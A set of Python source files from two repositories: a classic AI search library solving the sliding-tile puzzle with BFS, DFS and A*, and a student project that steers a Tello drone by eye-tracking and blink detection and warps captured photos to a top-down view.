state: The state whose actions are to be retrieved.
Returns:
An iterable containing all actions that can be taken in `state`.
"""
pass
@abstractmethod
def goal_test(self, state):
"""Tests whether or not a particular state is a goal state.
Args:
state: The state to be tested.
Returns:
True if `state` is a goal state and False otherwise.
"""
pass
@abstractmethod
def transition(self, state, action):
"""This method defines the transition model of the problem.
Given a state and an action, it will return the next state along with the step cost of that transition.
Args:
state: The current state.
action: The action being taken in `state`.
Returns:
The tuple `(next_state, step_cost)` where `next_state` is the state that we transitioned to and `step_cost`
is the cost associated with doing that transition.
"""
pass
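
# Minimal concrete sketch (illustrative, not part of the package): a toy
# number-line problem whose agent starts at some integer, may add or subtract
# 1 per step at unit cost, and whose goal is to reach 3. Plain integers hash
# and compare by value, so they satisfy the state requirements above.
class _CountToThree(AbstractProblem):
    def get_actions(self, state):
        return ['+1', '-1']

    def goal_test(self, state):
        return state == 3

    def transition(self, state, action):
        return (state + 1 if action == '+1' else state - 1), 1.0

# >>> _CountToThree(0).transition(0, '+1')
# (1, 1.0)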
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/heuristics.py
|
"""Provides heuristic functions for the sliding tile puzzle.
Author: <NAME>
"""
from cannibals.problems.sliding_tile import SlidingTilePuzzle
def make_heuristic_fn(problem, heuristic_fn):
"""Makes a heuristic function for the sliding tile puzzle.
This function should be used to construct the function that will be passed to the search strategy.
Args:
problem: The `SlidingTilePuzzle` for which a heuristic function should be constructed.
heuristic_fn: The heuristic function being used. E.g. `misplaced_tiles`.
Returns:
A function that accepts a single state as an argument and returns the estimated cost of that state, using the
provided heuristic.
"""
assert isinstance(problem, SlidingTilePuzzle)
return lambda state: heuristic_fn(state, problem.goal_state)
def misplaced_tiles(state, goal):
"""Computes the misplaced tiles heuristic.
This heuristic counts the number of tiles on the board that are not in their goal positions.
It is admissible and consistent.
Args:
state: The current state being evaluated.
goal: The goal state.
Returns:
The heuristic value, which is the number of tiles that are out of place.
"""
count = 0
for a, b in zip(state.tile_list, goal.tile_list):
if a != b:
count += 1
return count
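
# Worked example (illustrative): comparing '123456780' against the goal
# '123456708' tile by tile, only the last two positions differ ('8' vs '0'
# and '0' vs '8'), so the heuristic reports 2. Note this simple count also
# counts the blank tile when it is out of place.
# >>> from cannibals.problems.sliding_tile import Board
# >>> misplaced_tiles(Board('123456780'), Board('123456708'))
# 2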
|
rystrauss/cannibals
|
cannibals/search/__init__.py
|
from .base import SearchStrategy
from .informed_search import AStarSearch
from .uninformed_search import BreadthFirstSearch
from .uninformed_search import DepthFirstSearch
from .uninformed_search import UniformCostSearch
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/puzzle.py
|
"""This module defines the sliding tile puzzle problem.
Author: <NAME>
"""
from copy import copy
from cannibals.problems.base import AbstractProblem
from cannibals.problems.sliding_tile.board import Board
class SlidingTilePuzzle(AbstractProblem):
"""Implementation of the sliding tile puzzle.
The sliding tile puzzle, or n-puzzle, consists of an n by n board with n^2 - 1 numbered tiles and a blank space.
A tile adjacent to the blank space can slide into the space. The object is to reach a specified goal state.
In this implementation, we think of an action as moving the blank tile either up, down, left, or right.
    The 8-puzzle has 9!/2 = 181,440 reachable states and is easily solved. The 15-puzzle (on a 4×4 board) has around
    1.3 trillion states, and random instances can be solved optimally in a few milliseconds by the best search
    algorithms. The 24-puzzle (on a 5×5 board) has around 10^25 states, and random instances take several hours to
    solve optimally.
"""
VALID_ACTIONS = ['U', 'D', 'L', 'R']
def __init__(self, initial_state, goal_state='123456780'):
if isinstance(initial_state, str):
initial_state = Board(initial_state)
assert isinstance(initial_state, Board)
if isinstance(goal_state, str):
goal_state = Board(goal_state)
assert isinstance(goal_state, Board)
super().__init__(initial_state)
self.goal_state = goal_state
def get_actions(self, state):
actions = copy(self.VALID_ACTIONS)
if state.blank_pos[0] == 0:
actions.remove('U')
if state.blank_pos[0] == state.board_size - 1:
actions.remove('D')
if state.blank_pos[1] == 0:
actions.remove('L')
if state.blank_pos[1] == state.board_size - 1:
actions.remove('R')
return actions
def goal_test(self, state):
return state.tile_list == self.goal_state.tile_list
def transition(self, state, action):
return state.move(action), 1.0
|
rystrauss/cannibals
|
cannibals/search/frontiers.py
|
"""Contains implementations of various data structures which are to be used as frontiers.
Author: <NAME>
"""
import heapq
from abc import ABC, abstractmethod
from collections import deque
class Frontier(ABC):
"""The abstract base class representing a frontier.
A frontier is the collection of nodes that are currently under consideration for being visited next by the
search algorithm.
"""
def __init__(self, data):
self._data = data
self._hash_table = set(data)
def __contains__(self, item):
return self._hash_table.__contains__(item)
def __len__(self):
return len(self._data)
def __str__(self):
return str(self._data)
@abstractmethod
def push(self, element):
"""Adds an element to the frontier.
Args:
element: The element being added.
Returns:
None.
"""
pass
@abstractmethod
def pop(self):
"""Retrieves the next node to visit from the frontier.
Returns:
The next node to be visited.
"""
pass
def empty(self):
"""Determines whether or not the frontier is empty.
Returns:
True iff the frontier is empty and False otherwise.
"""
return len(self._data) == 0
class FIFOFrontier(Frontier):
"""A frontier that follows First-In-First-Out ordering.
Using a FIFO frontier results in the breadth-first search algorithm.
"""
def __init__(self, data):
super().__init__(deque(data))
def push(self, element):
self._data.append(element)
self._hash_table.add(element)
def pop(self):
removed = self._data.popleft()
self._hash_table.remove(removed)
return removed
class LIFOFrontier(Frontier):
"""A frontier that follows Last-In-First-Out ordering.
Using a LIFO frontier results in the depth-first search algorithm.
"""
def __init__(self, data):
super().__init__(deque(data))
def push(self, element):
self._data.append(element)
self._hash_table.add(element)
def pop(self):
removed = self._data.pop()
self._hash_table.remove(removed)
return removed
class PriorityFrontier(Frontier):
"""A frontier that used a priority queue to determine ordering.
This type of frontier is used by uniform cost search as well as A* search.
"""
def __init__(self, data):
super().__init__(data)
heapq.heapify(self._data)
def push(self, element):
heapq.heappush(self._data, element)
self._hash_table.add(element)
def pop(self):
removed = heapq.heappop(self._data)
self._hash_table.remove(removed)
return removed
def maybe_update(self, element):
"""Possibly updates the priority of a given node in the queue.
It is possible for two nodes to contain the same state but have different estimated solution costs (which
correspond to the priority in the queue). This method accepts a node whose state is also represented by
a node that is already in the frontier. The method will then check to see if the new node has a higher
priority (i.e. lower estimated solution cost). If so, it will replace the preexisting node in the frontier with
the better one. If not, the frontier will remain unchanged.
Args:
element: The node that might get updated. It is assumed that a node containing this node's state is
already in the frontier.
Returns:
None.
"""
# Get index for outdated version of element in the queue
index = self._data.index(element)
        # If the version already in the queue has a lower cost (higher priority), we can stop
if self._data[index] < element:
return
# Remove the outdated version from the hash table
self._hash_table.remove(self._data[index])
# Update element in the queue
self._data[index] = element
# Add it back to the hash table
self._hash_table.add(element)
# Restore the heap property
heapq.heapify(self._data)
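
# Usage sketch (illustrative, not part of the module): pushing a cheaper
# duplicate through maybe_update replaces the dearer entry already queued.
# Elements must define __lt__, __eq__ and __hash__, as cannibals.search.Node does.
# >>> from cannibals.search.base import Node
# >>> f = PriorityFrontier([Node("s", 5)])
# >>> f.maybe_update(Node("s", 2))  # same state, lower cost: replaces the old node
# >>> f.pop().path_cost
# 2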
|
rystrauss/cannibals
|
cannibals/search/base.py
|
"""This module contains the base components of search methods.
Author: <NAME>
"""
from abc import ABC, abstractmethod
class Node:
"""A node represents a single state in a search problem and is used by the graph-based search methods."""
def __init__(self, state, path_cost, estimated_cost=0.0, solution=None):
"""Constructs a new node.
Args:
state: The state associated with this node.
path_cost: The cost of the path leading to this node.
estimated_cost: The estimated cost from this node to the solution. This is only relevant to informed
                search methods. Defaults to 0.0 for uninformed search.
solution: A list of actions that represent the solution for reaching this node. Defaults to None.
"""
self.state = state
self.path_cost = path_cost
self.estimated_cost = estimated_cost
self.estimated_solution_cost = self.path_cost + self.estimated_cost
self.solution = solution or []
def __eq__(self, other):
return self.state.__eq__(other.state)
def __lt__(self, other):
return self.estimated_solution_cost < other.estimated_solution_cost
def __hash__(self):
return self.state.__hash__()
def expand(self, problem, heuristic_fn=None):
"""Expands this node by returning a list of its successors.
Each successor node contains a state that can be reached by taking an action in the current node's state.
Args:
problem: The `AbstractProblem` that is under consideration.
heuristic_fn: The optional heuristic function being used.
Returns:
A list of this node's successors.
"""
successors = []
for action in problem.get_actions(self.state):
next_state, step_cost = problem.transition(self.state, action)
estimated_cost = 0.0 if heuristic_fn is None else heuristic_fn(next_state)
successors.append(Node(next_state, self.path_cost + step_cost, estimated_cost, self.solution + [action]))
return successors
class SearchStrategy(ABC):
"""The abstract base class that all search strategies inherit from."""
@staticmethod
@abstractmethod
def search(problem):
"""Attempts to solve the given problem by performing a search over the state space.
Args:
problem: The `AbstractProblem` instance that is to be solved.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
pass
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/__init__.py
|
from .board import Board
from .puzzle import SlidingTilePuzzle
|
rystrauss/cannibals
|
cannibals/search/uninformed_search.py
|
"""Implementations of uninformed search strategies.
Author: <NAME>
"""
from cannibals.problems.base import AbstractProblem
from cannibals.search.base import Node, SearchStrategy
from cannibals.search.frontiers import FIFOFrontier, LIFOFrontier, Frontier
from cannibals.search.informed_search import AStarSearch
def _graph_search(frontier_type, problem):
"""Performs a graph search.
Args:
frontier_type: The type of frontier to use. Should be a subclass of `Frontier`.
problem: The `AbstractProblem` instance that is to be solved.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
assert isinstance(problem, AbstractProblem)
assert issubclass(frontier_type, Frontier)
node = Node(problem.initial_state, 0)
generated_nodes = 1
    if problem.goal_test(node.state):
        return node.solution, generated_nodes
frontier = frontier_type([node])
explored = set()
solution = None
while not frontier.empty():
node = frontier.pop()
explored.add(node)
children = node.expand(problem)
generated_nodes += len(children)
for child in children:
if not (child in explored or child in frontier):
if problem.goal_test(child.state):
solution = child.solution
break
frontier.push(child)
else:
continue
break
return solution, generated_nodes
class BreadthFirstSearch(SearchStrategy):
"""Implementation of breadth-first search."""
@staticmethod
def search(problem):
return _graph_search(FIFOFrontier, problem)
class DepthFirstSearch(SearchStrategy):
"""Implementation of depth-first search."""
@staticmethod
def search(problem):
return _graph_search(LIFOFrontier, problem)
class UniformCostSearch(SearchStrategy):
"""Implementation of uniform-cost search."""
@staticmethod
def search(problem):
return AStarSearch.search(problem)
|
rystrauss/cannibals
|
examples/8puzzle.py
|
"""This script provides an example of how to use `cannibals` on the 8-puzzle.
Author: <NAME>
"""
from cannibals.problems.sliding_tile.heuristics import misplaced_tiles, make_heuristic_fn
from cannibals.problems.sliding_tile.puzzle import SlidingTilePuzzle
from cannibals.search.informed_search import AStarSearch
from cannibals.search.uninformed_search import BreadthFirstSearch, UniformCostSearch
def main():
# Define the problem we want to solve
# This instance of the 8-puzzle is solvable in 10 moves
problem = SlidingTilePuzzle('635841027', '865317024')
# Solve the problem using three different algorithms
_, bfs_nodes = BreadthFirstSearch.search(problem)
_, uc_nodes = UniformCostSearch.search(problem)
# For A*, we specify that the misplaced tiles heuristic should be used
solution, astar_nodes = AStarSearch.search(problem, heuristic_fn=make_heuristic_fn(problem, misplaced_tiles))
print(f'Solution: {solution}')
print(f'\nNodes generated by BFS:\t{bfs_nodes}')
print(f'Nodes generated by UC:\t{uc_nodes}')
print(f'Nodes generated by A*:\t{astar_nodes}')
if __name__ == '__main__':
main()
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/board.py
|
"""Contains a class representing the board for the sliding tile puzzle.
Author: <NAME>
"""
import math
import re
from copy import copy
class Board:
"""A board of a sliding tile puzzle.
This class constitutes a state of the sliding tile puzzle search problem."""
def __init__(self, tile_list):
self.board_size = int(math.sqrt(len(tile_list)))
self.tile_list = list(tile_list)
self.blank_pos = self._convert_index(tile_list.index('0'))
def __eq__(self, other):
return isinstance(other, Board) and self.tile_list == other.tile_list
def __hash__(self):
return tuple(self.tile_list).__hash__()
def __str__(self):
s = ''.join(self.tile_list).replace('0', '_')
lines = re.findall('.' * self.board_size, s)
return '\n'.join(lines)
def _convert_index(self, index):
if isinstance(index, int):
row = index // self.board_size
col = index % self.board_size
return row, col
else:
row, col = index
return row * self.board_size + col
def move(self, action):
"""Returns the board that results from taking a given action in this board.
Args:
action: The action to be taken. Either 'U', 'D', 'L', or 'R'.
Returns:
A board that reflects the transition from the given action.
"""
if action == 'U':
swap_pos = self.blank_pos[0] - 1, self.blank_pos[1]
elif action == 'D':
swap_pos = self.blank_pos[0] + 1, self.blank_pos[1]
elif action == 'L':
swap_pos = self.blank_pos[0], self.blank_pos[1] - 1
elif action == 'R':
swap_pos = self.blank_pos[0], self.blank_pos[1] + 1
else:
raise ValueError(f'{action} is not a valid action')
new_tile_list = copy(self.tile_list)
temp = new_tile_list[self._convert_index(swap_pos)]
new_tile_list[self._convert_index(swap_pos)] = '0'
new_tile_list[self._convert_index(self.blank_pos)] = temp
return Board(new_tile_list)
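
# Usage sketch (illustrative, not part of the module): '0' marks the blank,
# and __str__ renders it as '_'. Moving 'U' slides the blank up one row:
# >>> print(Board('123405678'))
# 123
# 4_5
# 678
# >>> print(Board('123405678').move('U'))
# 1_3
# 425
# 678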
|
catsaveearth/DRONE_EYE-Image-Warpping
|
final_Dron_Eyes.py
|
from tkinter import *
from PIL import ImageTk, Image
import cv2
import dlib
import numpy as np
import math
from math import dist
from utils import *
from djitellopy import Tello  # assumed: the Tello class used below matches the djitellopy API
import keyboard, time
from threading import Thread
from skimage import exposure
w, h = 640, 480
#global variable
font = cv2.FONT_ITALIC
frame = None
horizon = False
retrial_brow = True
brow_basis = 0
threshold_value = 30
eye_detect = False
i = 0
time_value = 0
case_cnt = list([0, 0, 0, 0, 0, 0]) #None, left, right, rot_ccw, rot_cw, close
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +'haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +'haarcascade_lefteye_2splits.xml')
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')
# eye states
leftState = None #None, left, right, close
rightState = None
blinkCnt = 0
blinkTimer = 0
pre_rightState = None
pre_leftState = None
#drone state
flying = False
showStream = 0
tello = None
tello_frame_read = None
# check state changes -> drone movement
def selectMotion():
global leftState, rightState, case_cnt, blinkCnt, flying, tello
    if leftState == "None" and rightState == "None":  # reset if the None state persists for a while
case_cnt[0] += 1
if case_cnt[0] == 2:
case_cnt = list([0, 0, 0, 0, 0, 0]) #None, left, right, rot_ccw, rot_cw, close
Current_motion.config(text="No motion")
elif leftState == "left" and rightState == "left":
case_cnt[1] += 1
if case_cnt[1] >= 2:
if flying == True:
tello.move_left(20)
print("move_left")
Current_motion.config(text="move_left")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "right" and rightState == "right":
case_cnt[2] += 1
if case_cnt[2] >= 2:
if flying == True:
tello.move_right(20)
print("move_right")
Current_motion.config(text="move_right")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "close" and rightState != "close":
case_cnt[3] += 1
if case_cnt[3] >= 2:
if flying == True:
tello.rotate_counter_clockwise(30)
print("rotate CCW")
Current_motion.config(text="rotate CCW")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState != "close" and rightState == "close":
case_cnt[4] += 1
if case_cnt[4] >= 2:
if flying == True:
tello.rotate_clockwise(20)
print("rotate CW")
Current_motion.config(text="rotate CW")
case_cnt = list([0, 0, 0, 0, 0, 0])
elif leftState == "close" and rightState == "close":
case_cnt[5] += 1
if case_cnt[5] >= 3:
if flying == False:
tello.takeoff()
flying = True
print("takeoff")
Current_motion.config(text="takeoff")
else:
tello.land()
flying = False
print("land")
Current_motion.config(text="land")
case_cnt = list([0, 0, 0, 0, 0, 0])
def checkChangEyes():
global leftState, rightState, blinkCnt, pre_rightState, pre_leftState, blinkTimer, tello
if time_value - blinkTimer > 3:
if blinkCnt == 2:
blinkCnt = 0
if flying == True:
tello.move_forward(30)
print("move_front")
Current_motion.config(text="move_front")
elif blinkCnt == 3:
blinkCnt = 0
if flying == True:
tello.move_back(30)
print("move_back")
Current_motion.config(text="move_back")
else:
blinkCnt = 0
if pre_leftState == "close" and leftState != "close":
if pre_rightState == "close" and rightState != "close":
if blinkCnt == 0:
blinkTimer = time_value
blinkCnt += 1
pre_leftState = leftState
pre_rightState = rightState
# face detection
def face_landmark(gray, frame):
    global eye_detect, horizon, brow_basis, leftState, rightState, retrial_brow
if eye_detect == False:
return
# dlib (face_landmark)
rects = detector(gray, 1) # rects contains all the faces detected
for (i, rect) in enumerate(rects):
shape = predictor(gray, rect)
shape = shape_to_np(shape)
        (lStart, lEnd) = (42, 48)  # eye landmark indices
(rStart, rEnd) = (36, 42)
leftEye = shape[lStart:lEnd]
rightEye = shape[rStart:rEnd]
leftbrow = shape[24]
rightbrow = shape[19]
leftEAR = eye_aspect_ratio(leftEye)
rightEAR = eye_aspect_ratio(rightEye)
(lx, ly) = leftbrow
cv2.circle(frame, (lx, ly), 1, (0, 255, 0), 3)
(rx, ry) = rightbrow
cv2.circle(frame, (rx, ry), 1, (0, 0, 255), 3)
        if horizon == False or retrial_brow == True:
            retrial_brow = False
brow_basis = ly-ry
eyebrowError['state'] = NORMAL
if horizon == True:
if leftEAR < 0.18 or rightEAR < 0.18:
if abs(ly - ry + brow_basis) > 6:
if ly - ry > 0:
leftState = "close"
rightState = "None"
else:
rightState = "close"
leftState = "None"
else:
leftState = "close"
rightState = "close"
else:
rightState = "None"
leftState = "None"
def faceDetect_cascade(gray, frame):
global eye_detect, horizon, leftState, rightState
    # face detection
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y, w,h) in faces:
        cv2.rectangle(frame, (x,y), (x+w, y+h), (255,0,0), 2)  # bounding rectangle
if w < 250:
cv2.putText(frame, "closer please", (x-5, y-5), font, 0.5, (255,255,0),2)
eye_detect = False
continue
else:
cv2.putText(frame, "Good", (x-5, y-5), font, 0.5, (255,255,0),2)
eye_detect = True
        if eye_detect:  # find the eyes
roi_gray = gray[y:int(y+h/2), x:x+w]
roi_color = frame[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
width_centor = x+w/2
current = None #True - right / False - left
eyes_num = 0
for (ex, ey, ew, eh) in eyes:
if eyes_num > 1:
continue
eyes_num = eyes_num + 1
pupil_frame = roi_gray[ey: ey+eh, ex: ex+ew]
cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey +eh), (255, 0, 0), 2)
                if width_centor > x + ex + ew/2:  # right eye
right_gray_roi, contours = pupil_detect(pupil_frame, threshold_value)
current = True
                else:  # left eye
left_gray_roi, contours = pupil_detect(pupil_frame, threshold_value)
current = False
if len(contours) != 0:
                    (cx, cy, cw, ch) = cv2.boundingRect(contours[0])  # take the largest contour
centerX = int((cx*2 + cw)/2)
centerY = int((cy*2 + ch)/2)
cv2.circle(roi_color, (ex + centerX, ey + centerY), 1, (0, 0, 255), 3)
cv2.rectangle(roi_color, (ex + cx, ey + cy), (ex + cx+cw, ey + cy+ch), (255, 0, 0), 2)
else:
if current == True:
rightState = "close"
else:
leftState = "close"
if current == True:
if rightState == "close":
continue
if abs(ew/2 - centerX) > 5:
if ew/2 - centerX > 0: #right
rightState = "right"
else:
rightState = "left"
else:
rightState = "None"
else:
if leftState == "close":
continue
if abs(ew/2 - centerX) > 5:
if ew/2 - centerX > 0: #right
leftState = "right"
else:
leftState = "left"
else:
leftState = "None"
def pupil_detect(gray_roi, threshold_value):
rows, cols = gray_roi.shape
    gray_roi = cv2.GaussianBlur(gray_roi, (7,7), 0)  # remove noise
    # detect the pupil
    _, threshold = cv2.threshold(gray_roi, threshold_value, 255, cv2.THRESH_BINARY_INV)
    # fetch the pupil contour coordinates for display
    contours, none = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # keep only the pupil (sort contours largest-first)
contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
return threshold, contours
def eye_aspect_ratio(eye):
A = dist(eye[1], eye[5])
B = dist(eye[2], eye[4])
C = dist(eye[0], eye[3])
ear = (A + B) / (2.0 * C)
return ear
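
# Hedged aside: for the six dlib eye landmarks, the vertical gaps A and B of an
# open eye are large relative to the horizontal span C, so EAR = (A + B) / (2C)
# sits around 0.3; as the lid closes, A and B shrink toward zero while C barely
# changes, which is why face_landmark() above treats EAR < 0.18 as a closed eye.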
def shape_to_np(shape, dtype="int"):
coords = np.zeros((68, 2), dtype=dtype)
for i in range(0, 68):
coords[i] = (shape.part(i).x, shape.part(i).y)
return coords
#Button event handling
def pupil_thresholdUP():
global threshold_value
threshold_value = threshold_value + 5
th_label.config(text=str(threshold_value))
def pupil_thresholdDown():
global threshold_value
threshold_value = threshold_value - 5
th_label.config(text=str(threshold_value))
def setBrow():
    global horizon, brow_basis, retrial_brow
horizon = True
retrial_brow = True
brow_label.config(text=str(brow_basis))
settingEnd['state'] = NORMAL
# Drone Stream
def startDrone():
global showStream
print("startDrone")
if showStream == 0:
showStream = Thread(target = droneSteram)
print(showStream)
showStream.start()
def droneSteram():
global tello, tello_frame_read
print("droneStream")
tello = Tello()
tello.connect()
tello.streamon()
tello_frame_read = tello.get_frame_read()
time.sleep(5)
print("get ready")
while True:
telloImg = tello_frame_read.frame
telloImg2 = cv2.resize(telloImg, (w, h))
cv2.imshow("Drone View", telloImg2)
cv2.waitKey(1)
def checkDroneState():
global flying, tello_frame_read
if tello_frame_read != None:
take_picture['state'] = NORMAL
if flying == True:
up_btn['state'] = NORMAL
down_btn['state'] = NORMAL
else:
up_btn['state'] = DISABLED
down_btn['state'] = DISABLED
def droneUp():
global flying, tello
if flying == True:
tello.move_up(20)
print("move_up")
Current_motion.config(text="move_up")
def droneDown():
global flying, tello
if flying == True:
tello.move_down(20)
print("move_down")
Current_motion.config(text="move_down")
def nothing():
pass
#function to order points into a proper rectangle
def order_points(pts):
    # initialize a list of coordinates that will be ordered
# such that the first entry in the list is the top-left,
# the second entry is the top-right, the third is the
# bottom-right, and the fourth is the bottom-left
rect = np.zeros((4, 2), dtype="float32")
# the top-left point will have the smallest sum, whereas
# the bottom-right point will have the largest sum
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
# now, compute the difference between the points, the
# top-right point will have the smallest difference,
# whereas the bottom-left will have the largest difference
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
# return the ordered coordinates
return rect
#function to transform image to four points
def four_point_transform(image, pts):
# obtain a consistent order of the points and unpack them
# individually
rect = order_points(pts)
# # multiply the rectangle by the original ratio
# rect *= ratio
(tl, tr, br, bl) = rect
# compute the width of the new image, which will be the
# maximum distance between bottom-right and bottom-left
# x-coordiates or the top-right and top-left x-coordinates
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
# compute the height of the new image, which will be the
# maximum distance between the top-right and bottom-right
# y-coordinates or the top-left and bottom-left y-coordinates
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
# now that we have the dimensions of the new image, construct
# the set of destination points to obtain a "birds eye view",
# (i.e. top-down view) of the image, again specifying points
# in the top-left, top-right, bottom-right, and bottom-left
# order
dst = np.array([
[0, 0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype="float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
# return the warped image
return warped
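# Minimal usage sketch (illustrative): warping a quadrilateral region of an
# image to a top-down view. `corners` is assumed to be a (4, 2) float array
# holding the region's corner points in any order.
#   corners = np.array([[10, 10], [90, 12], [88, 80], [8, 78]], dtype="float32")
#   top_down = four_point_transform(img, corners)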
#function to find the two largest contours, which are likely the
# full image border and our rectangular edged object
def findLargestContours(cntList, cntWidths):
newCntList = []
newCntWidths = []
#finding 1st largest rectangle
first_largest_cnt_pos = cntWidths.index(max(cntWidths))
# adding it in new
newCntList.append(cntList[first_largest_cnt_pos])
newCntWidths.append(cntWidths[first_largest_cnt_pos])
#removing it from old
cntList.pop(first_largest_cnt_pos)
cntWidths.pop(first_largest_cnt_pos)
    #finding second largest rectangle
    second_largest_cnt_pos = cntWidths.index(max(cntWidths))
    # adding it in new
    newCntList.append(cntList[second_largest_cnt_pos])
    newCntWidths.append(cntWidths[second_largest_cnt_pos])
    #removing it from old
    cntList.pop(second_largest_cnt_pos)
    cntWidths.pop(second_largest_cnt_pos)
    print('Old Screen Dimensions filtered', cntWidths)
    print('Screen Dimensions filtered', newCntWidths)
return newCntList, newCntWidths
def takePicture():
global tello_frame_read
img = tello_frame_read.frame
print("take a picture")
current_time = time.strftime('%H%M%S')
cv2.imshow(current_time + ".png", img)
pic_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
pic_gray = cv2.GaussianBlur(pic_gray, (5, 5), 0)
cv2.namedWindow("Canny Edge")
cv2.createTrackbar('low threshold', 'Canny Edge', 0, 1000, nothing)
cv2.createTrackbar('high threshold', 'Canny Edge', 0, 1000, nothing)
cv2.setTrackbarPos('low threshold', 'Canny Edge', 50)
cv2.setTrackbarPos('high threshold', 'Canny Edge', 150)
while True:
low = cv2.getTrackbarPos('low threshold', 'Canny Edge')
high = cv2.getTrackbarPos('high threshold', 'Canny Edge')
img_canny = cv2.Canny(pic_gray, low, high)
cv2.imshow("Canny Edge", img_canny)
keypress = cv2.waitKey(1)
if keypress & 0xFF == ord('q'):
break
#get contours
    cnts, hierarchy = cv2.findContours(img_canny, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)
screenCntList = []
scrWidths = []
for cnt in cnts:
peri = cv2.arcLength(cnt, True) # cnts[1] always rectangle O.o
approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)
screenCnt = approx
# print(len(approx))
if (len(screenCnt) == 4):
(X, Y, W, H) = cv2.boundingRect(cnt)
# print('X Y W H', (X, Y, W, H))
screenCntList.append(screenCnt)
scrWidths.append(W)
    screenCntList, scrWidths = findLargestContours(screenCntList, scrWidths)
pts = screenCntList[0].reshape(4, 2)
warped = four_point_transform(img, pts)
cv2.imshow("warp", warped)
cv2.waitKey(0)
window = Tk()
window.title("Drone Eyes")
window.geometry("720x650")
window.resizable(False, False)
title = Label(window, text="Setting")
title.pack()
app = Frame(window, bg="white")
app.pack()
lmain = Label(app)
lmain.pack()
th_label = Label(window, text="30")
pupilPlusBtn = Button(window, text = 'pupil ++', command = pupil_thresholdUP)
pupilMinusBtn = Button(window, text = 'pupil --', command = pupil_thresholdDown)
th_label.place(x=110, y=520)
pupilPlusBtn.place(x=50, y=520)
pupilMinusBtn.place(x=135, y=520)
brow_label = Label(window, text="0")
eyebrowError = Button(window, text = 'brow zero adjustment', command = setBrow, state=DISABLED)
settingEnd = Button(window, text = 'START', state=DISABLED, command = startDrone)
brow_label.place(x=400, y=520)
eyebrowError.place(x=420, y=520)
settingEnd.place(x=630, y=520)
Current_motion = Label(window, text="No Motion")
Current_motion.place(x=300, y=550)
up_btn = Button(window, text = 'UP', state=DISABLED, command =droneUp)
down_btn = Button(window, text = 'DOWN', state=DISABLED, command =droneDown)
up_btn.place(x=400, y=600)
down_btn.place(x=430, y=600)
take_picture = Button(window, text = 'Take a Picture', state=DISABLED, command =takePicture)
take_picture.place(x=600, y=600)
# Capture from camera
cap = cv2.VideoCapture(0)
# function for video streaming
def video_stream():
global i, time_value
checkDroneState()
if time_value == int(i):
time_value = int(i) + 1
if horizon == True and eye_detect == True:
selectMotion()
i += 0.5
checkChangEyes()
_, img = cap.read()
frame = img
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
face_landmark(gray, frame)
faceDetect_cascade(gray, frame)
cv2.putText(frame, str(leftState), (300,300), font, 0.5, (255,255,0), 2)
cv2.putText(frame, str(rightState), (350,300), font, 0.5, (255,255,0), 2)
img = Image.fromarray(frame)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, video_stream)
video_stream()
window.mainloop()
|
catsaveearth/DRONE_EYE-Image-Warpping
|
utils.py
|
<gh_stars>0
#201935023 김수현
from djitellopy import Tello
import cv2
import time
def initTello():
myDrone = Tello()
myDrone.connect()
myDrone.for_back_velocity = 0
myDrone.left_right_velocity = 0
myDrone.up_down_velocity = 0
myDrone.yaw_velocity = 0
myDrone.speed = 0
print("\n * Drone battery percentage : " + str(myDrone.get_battery()) + "%")
myDrone.streamoff()
return myDrone
def moveTello(myDrone):
myDrone.takeoff()
time.sleep(5)
myDrone.move_back(50)
time.sleep(5)
myDrone.rotate_clockwise(360)
time.sleep(5)
myDrone.move_forward(50)
time.sleep(5)
myDrone.flip_right()
time.sleep(5)
myDrone.flip_left()
time.sleep(5)
myDrone.land()
time.sleep(5)
def telloGetFrame(myDrone, w = 360, h = 240):
myFrame = myDrone.get_frame_read()
myFrame = myFrame.frame #numpy.ndarray
img = cv2.resize(myFrame, (w, h)) #numpy.ndarray
return img
#201935023 김수현
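# Minimal usage sketch (illustrative, not part of the original module): a
# capture-and-display loop built from the helpers above. Assumes the Tello
# is powered on and reachable over Wi-Fi.
def _stream_demo():
    myDrone = initTello()
    myDrone.streamon()
    while True:
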